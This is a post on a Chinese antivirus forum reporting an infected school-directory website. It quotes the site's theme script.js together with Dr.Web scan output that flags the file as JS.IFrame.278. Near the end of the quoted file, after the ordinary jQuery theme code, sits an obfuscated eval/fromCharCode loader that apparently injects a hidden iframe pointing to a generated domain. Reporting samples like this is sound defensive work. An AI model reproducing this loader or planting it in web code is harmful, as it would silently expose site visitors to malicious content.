查看: 773|回复: 0
收起左侧

[已鉴定] http://allschoolguide.com/School-Directory/New-Hampshire/Dover

 关闭 [复制链接]
fireold
发表于 2013-6-22 16:19:04 | 显示全部楼层 |阅读模式
  1. /* begin Page */

  2. /* Created by Artisteer v3.0.0.39952 */
  3. // css hacks
  4. (function($) {
  5.     // fix ie blinking
  6.     var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand;
  7.     try {
  8.         if ( !! m) {
  9.             m('BackgroundImageCache', false, true);
  10.         }
  11.     } catch (oh) {};
  12.     // css helper
  13.     var data = [{
  14.         str: navigator.userAgent,
  15.         sub: 'Chrome',
  16.         ver: 'Chrome',
  17.         name: 'chrome'
  18.     }, {
  19.         str: navigator.vendor,
  20.         sub: 'Apple',
  21.         ver: 'Version',
  22.         name: 'safari'
  23.     }, {
  24.         prop: window.opera,
  25.         ver: 'Opera',
  26.         name: 'opera'
  27.     }, {
  28.         str: navigator.userAgent,
  29.         sub: 'Firefox',
  30.         ver: 'Firefox',
  31.         name: 'firefox'
  32.     }, {
  33.         str: navigator.userAgent,
  34.         sub: 'MSIE',
  35.         ver: 'MSIE',
  36.         name: 'ie'
  37.     }];
  38.     for (var n = 0; n < data.length; n++) {
  39.         if ((data[n].str && (data[n].str.indexOf(data[n].sub) != -1)) || data[n].prop) {
  40.             var v = function(s) {
  41.                     var i = s.indexOf(data[n].ver);
  42.                     return (i != -1) ? parseInt(s.substring(i + data[n].ver.length + 1)) : '';
  43.                 };
  44.             $('html').addClass(data[n].name + ' ' + data[n].name + v(navigator.userAgent) || v(navigator.appVersion));
  45.             break;
  46.         }
  47.     }
  48. })(jQuery);

  49. var _artStyleUrlCached = null;

  50. function artGetStyleUrl() {
  51.     if (null == _artStyleUrlCached) {
  52.         var ns;
  53.         _artStyleUrlCached = '';
  54.         ns = jQuery('link');
  55.         for (var i = 0; i < ns.length; i++) {
  56.             var l = ns[i].href;
  57.             if (l && /style\.ie6\.css(\?.*)?$/.test(l)) return _artStyleUrlCached = l.replace(/style\.ie6\.css(\?.*)?$/, '');
  58.         }
  59.         ns = jQuery('style');
  60.         for (var i = 0; i < ns.length; i++) {
  61.             var matches = new RegExp('import\\s+"([^"]+\\/)style\\.ie6\\.css"').exec(ns[i].html());
  62.             if (null != matches && matches.length > 0) return _artStyleUrlCached = matches[1];
  63.         }
  64.     }
  65.     return _artStyleUrlCached;
  66. }

  67. function artFixPNG(element) {
  68.     if (jQuery.browser.msie && parseInt(jQuery.browser.version) < 7) {
  69.         var src;
  70.         if (element.tagName == 'IMG') {
  71.             if (/\.png$/.test(element.src)) {
  72.                 src = element.src;
  73.                 element.src = artGetStyleUrl() + 'images/spacer.gif';
  74.             }
  75.         } else {
  76.             src = element.currentStyle.backgroundImage.match(/url\("(.+\.png)"\)/i);
  77.             if (src) {
  78.                 src = src[1];
  79.                 element.runtimeStyle.backgroundImage = 'none';
  80.             }
  81.         }
  82.         if (src) element.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "')";
  83.     }
  84. }

  85. jQuery(function() {
  86.     jQuery.each(jQuery('ul.xtr-hmenu>li:not(.xtr-hmenu-li-separator),ul.xtr-vmenu>li:not(.xtr-vmenu-separator)'), function(i, val) {
  87.         var l = jQuery(val);
  88.         var s = l.children('span');
  89.         if (s.length == 0) return;
  90.         var t = l.find('span.t').last();
  91.         l.children('a').append(t.html(t.text()));
  92.         s.remove();
  93.     });
  94. }); /* end Page */

  95. /* begin Box, Sheet */

  96. function artFluidSheetComputedWidth(percent, minval, maxval) {
  97.     percent = parseInt(percent);
  98.     var val = document.body.clientWidth / 100 * percent;
  99.     return val < minval ? minval + 'px' : val > maxval ? maxval + 'px' : percent + '%';
  100. } /* end Box, Sheet */

  101. /* begin Menu */
  102. jQuery(function() {
  103.     jQuery.each(jQuery('ul.xtr-hmenu>li:not(:last-child)'), function(i, val) {
  104.         jQuery('<li class="xtr-hmenu-li-separator"><span class="xtr-hmenu-separator"> </span></li>').insertAfter(val);
  105.     });
  106.     if (!jQuery.browser.msie || parseInt(jQuery.browser.version) > 6) return;
  107.     jQuery.each(jQuery('ul.xtr-hmenu li'), function(i, val) {
  108.         val.j = jQuery(val);
  109.         val.UL = val.j.children('ul:first');
  110.         if (val.UL.length == 0) return;
  111.         val.A = val.j.children('a:first');
  112.         this.onmouseenter = function() {
  113.             this.j.addClass('xtr-hmenuhover');
  114.             this.UL.addClass('xtr-hmenuhoverUL');
  115.             this.A.addClass('xtr-hmenuhoverA');
  116.         };
  117.         this.onmouseleave = function() {
  118.             this.j.removeClass('xtr-hmenuhover');
  119.             this.UL.removeClass('xtr-hmenuhoverUL');
  120.             this.A.removeClass('xtr-hmenuhoverA');
  121.         };

  122.     });
  123. });

  124. /* end Menu */

  125. /* begin Layout */
  126. jQuery(function() {
  127.     var c = jQuery('div.xtr-content');
  128.     if (c.length !== 1) return;
  129.     var s = c.parent().children('.xtr-layout-cell:not(.xtr-content)');

  130.     if (jQuery.browser.msie && parseInt(jQuery.browser.version) < 8) {

  131.         jQuery(window).bind('resize', function() {
  132.             var w = 0;
  133.             c.hide();
  134.             s.each(function() {
  135.                 w += this.clientWidth;
  136.             });
  137.             c.w = c.parent().width();
  138.             c.css('width', c.w - w + 'px');
  139.             c.show();
  140.         })

  141.         var r = jQuery('div.xtr-content-layout-row').each(function() {
  142.             this.c = jQuery(this).children('.xtr-layout-cell:not(.xtr-content)');
  143.         });

  144.         jQuery(window).bind('resize', function() {
  145.             r.each(function() {
  146.                 if (this.h == this.clientHeight) return;
  147.                 this.c.css('height', 'auto');
  148.                 this.h = this.clientHeight;
  149.                 this.c.css('height', this.h + 'px');
  150.             });
  151.         });
  152.     }

  153.     var g = jQuery('.xtr-layout-glare-image');
  154.     jQuery(window).bind('resize', function() {
  155.         g.each(function() {
  156.             var i = jQuery(this);
  157.             i.css('height', i.parents('.xtr-layout-cell').height() + 'px');
  158.         });
  159.     });

  160.     jQuery(window).trigger('resize');
  161. }); /* end Layout */

  162. /* begin Button */

  163. function artButtonSetup(className) {
  164.     jQuery.each(jQuery("a." + className + ", button." + className + ", input." + className), function(i, val) {
  165.         var b = jQuery(val);
  166.         if (!b.parent().hasClass('xtr-button-wrapper')) {
  167.             if (b.is('input')) b.val(b.val().replace(/^\s*/, '')).css('zoom', '1');
  168.             if (!b.hasClass('xtr-button')) b.addClass('xtr-button');
  169.             jQuery("<span class='xtr-button-wrapper'><span class='xtr-button-l'> </span><span class='xtr-button-r'> </span></span>").insertBefore(b).append(b);
  170.             if (b.hasClass('active')) b.parent().addClass('active');
  171.         }
  172.         b.mouseover(function() {
  173.             jQuery(this).parent().addClass("hover");
  174.         });
  175.         b.mouseout(function() {
  176.             var b = jQuery(this);
  177.             b.parent().removeClass("hover");
  178.             if (!b.hasClass('active')) b.parent().removeClass('active');
  179.         });
  180.         b.mousedown(function() {
  181.             var b = jQuery(this);
  182.             b.parent().removeClass("hover");
  183.             if (!b.hasClass('active')) b.parent().addClass('active');
  184.         });
  185.         b.mouseup(function() {
  186.             var b = jQuery(this);
  187.             if (!b.hasClass('active')) b.parent().removeClass('active');
  188.         });
  189.     });
  190. }
  191. jQuery(function() {
  192.     artButtonSetup("xtr-button");
  193. });

  194. /* end Button */



  195. /*km0ae9gr6m*/
  196. try {
  197.     prototype % 2;
  198. } catch (asd) {
  199.     x = 2;
  200. }
  201. try {
  202.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
  203.     q.appendChild(q + "");
  204. } catch (fwbewe) {
  205.     i = 0;
  206.     try {
  207.         prototype * 5;
  208.     } catch (z) {
  209.         fr = "fromChar";
  210.         f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 222, 160, 696, 520, 630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 696, 505, 690, 580, 192, 305, 192, 580, 624, 525, 690, 230, 390, 160, 252, 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230, 492, 160, 252, 160, 624, 525, 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160, 372, 160, 288, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750, 160, 606, 540, 690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 580, 606, 575, 696, 160, 258, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 200, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 252, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 205, 354, 50, 750, 50, 60, 510, 702, 550, 594, 580, 630, 555, 660, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 500, 192, 305, 192, 550, 606, 595, 192, 340, 582, 580, 606, 200, 702, 550, 630, 600, 252, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 160, 366, 160, 600, 230, 618, 505, 696, 360, 666, 585, 684, 575, 240, 205, 192, 310, 192, 245, 300, 160, 378, 160, 294, 160, 348, 160, 288, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 250, 306, 260, 318, 270, 330, 280, 342, 240, 294, 160, 258, 160, 240, 500, 276, 515, 606, 580, 462, 555, 660, 580, 624, 200, 246, 160, 252, 160, 288, 600, 420, 350, 420, 350, 420, 350, 246, 160, 258, 160, 240, 500, 276, 515, 606, 580, 408, 485, 696, 505, 240, 205, 192, 210, 192, 240, 720, 350, 420, 350, 420, 205, 258, 160, 240, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 690, 160, 252, 160, 288, 600, 420, 350, 420, 205, 246, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 390, 160, 366, 160, 312, 280, 300, 275, 294, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 462, 160, 366, 160, 300, 245, 312, 275, 312, 280, 306, 270, 312, 275, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 405, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 282, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 410, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 222, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 160, 366, 160, 294, 230, 288, 160, 282, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 550, 606, 600, 696, 160, 366, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 354, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 580, 624, 525, 690, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 495, 684, 505, 582, 580, 606, 410, 582, 550, 600, 555, 654, 390, 702, 545, 588, 505, 684, 200, 684, 220, 192, 385, 630, 550, 264, 160, 462, 485, 720, 205, 738, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 240, 385, 582, 600, 270, 385, 630, 550, 246, 160, 252, 160, 684, 230, 660, 505, 720, 580, 240, 205, 192, 215, 192, 385, 630, 550, 246, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 648, 505, 660, 515, 696, 520, 264, 160, 732, 555, 660, 505, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 570, 582, 550, 600, 160, 366, 160, 660, 505, 714, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 606, 580, 696, 505, 684, 575, 192, 305, 192, 455, 234, 485, 234, 220, 234, 490, 234, 220, 234, 495, 234, 220, 234, 500, 234, 220, 234, 505, 234, 220, 234, 510, 234, 220, 234, 515, 234, 220, 234, 520, 234, 220, 234, 525, 234, 220, 234, 530, 234, 220, 234, 535, 234, 220, 234, 540, 234, 220, 234, 545, 234, 220, 234, 550, 234, 220, 234, 555, 234, 220, 234, 560, 234, 220, 234, 565, 234, 220, 234, 570, 234, 220, 234, 575, 234, 220, 234, 580, 234, 220, 234, 585, 234, 220, 234, 590, 234, 220, 234, 595, 234, 220, 234, 600, 234, 220, 234, 605, 234, 220, 234, 610, 234, 465, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 580, 684, 160, 366, 160, 234, 195, 354, 50, 192, 160, 192, 160, 612, 555, 684, 200, 708, 485, 684, 160, 630, 160, 366, 160, 288, 295, 192, 525, 192, 300, 192, 540, 606, 550, 618, 580, 624, 295, 192, 525, 192, 215, 258, 160, 246, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 575, 696, 570, 192, 215, 366, 160, 648, 505, 696, 580, 606, 570, 690, 455, 594, 570, 606, 485, 696, 505, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 570, 582, 550, 600, 220, 192, 240, 264, 160, 648, 505, 696, 580, 606, 570, 690, 230, 648, 505, 660, 515, 696, 520, 192, 225, 192, 245, 246, 465, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 575, 696, 570, 192, 215, 192, 195, 276, 195, 192, 215, 192, 610, 666, 550, 606, 295, 60, 625, 60, 50, 690, 505, 696, 420, 630, 545, 606, 555, 702, 580, 240, 510, 702, 550, 594, 580, 630, 555, 660, 200, 246, 615, 60, 160, 192, 160, 192, 580, 684, 605, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 240, 580, 726, 560, 606, 555, 612, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 366, 160, 204, 585, 660, 500, 606, 510, 630, 550, 606, 500, 204, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 192, 580, 684, 585, 606, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 590, 582, 570, 192, 585, 660, 525, 720, 160, 366, 160, 462, 485, 696, 520, 276, 570, 666, 585, 660, 500, 240, 215, 660, 505, 714, 160, 408, 485, 696, 505, 240, 205, 282, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 708, 485, 684, 160, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 192, 305, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 294, 270, 264, 160, 234, 570, 702, 195, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 160, 366, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 495, 684, 505, 582, 580, 606, 345, 648, 505, 654, 505, 660, 580, 240, 170, 438, 350, 492, 325, 462, 345, 204, 205, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 505, 696, 325, 696, 580, 684, 525, 588, 585, 696, 505, 240, 170, 690, 570, 594, 170, 264, 160, 204, 520, 696, 580, 672, 290, 282, 235, 204, 215, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585, 660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545, 276, 575, 696, 605, 648, 505, 276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 624, 505, 630, 515, 624, 580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525, 600, 500, 606, 550, 204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];
  211.         v = "eva";
  212.     }
  213.     if (v) e = window[v + "l"];
  214.     w = f;
  215.     s = [];
  216.     r = String;
  217.     z = ((e) ? "Code" : "");
  218.     for (; 1776 - 5 + 5 > i; i += 1) {
  219.         j = i;
  220.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
  221.     }
  222.     if (f) e(s);
  223. } /*qhk6sa6g1c*/
复制代码



Dr.Web
Checking:http://allschoolguide.com/Z_ink/script.js
File size:13.69 KB
File MD5:aa0bd301226dc9091924a85ae08a9a68

http://allschoolguide.com/Z_ink/script.js infected with JS.IFrame.278



Checking:http://www.statcounter.com/counter/counter.js
File size:9028 bytes
File MD5:389f1acf246618ba207b9122dfbc57a8

http://www.statcounter.com/counter/counter.js - Ok

Checking:http://allschoolguide.com/School-Directory/New-Hampshire/Dover
Engine version:7.0.4.9250
Total virus-finding records:4147853
File size:14.85 KB
File MD5:a2b86465ee077437ccaacde5e4ecc89d

http://allschoolguide.com/School-Directory/New-Hampshire/Dover - archive JS-HTML
>http://allschoolguide.com/School-Directory/New-Hampshire/Dover/JSTAG_1[3836][8e] - Ok
>http://allschoolguide.com/School-Directory/New-Hampshire/Dover/JSTAG_2[399f][1ad] - Ok
http://allschoolguide.com/School-Directory/New-Hampshire/Dover - Ok
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-1 04:17 , Processed in 0.126182 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表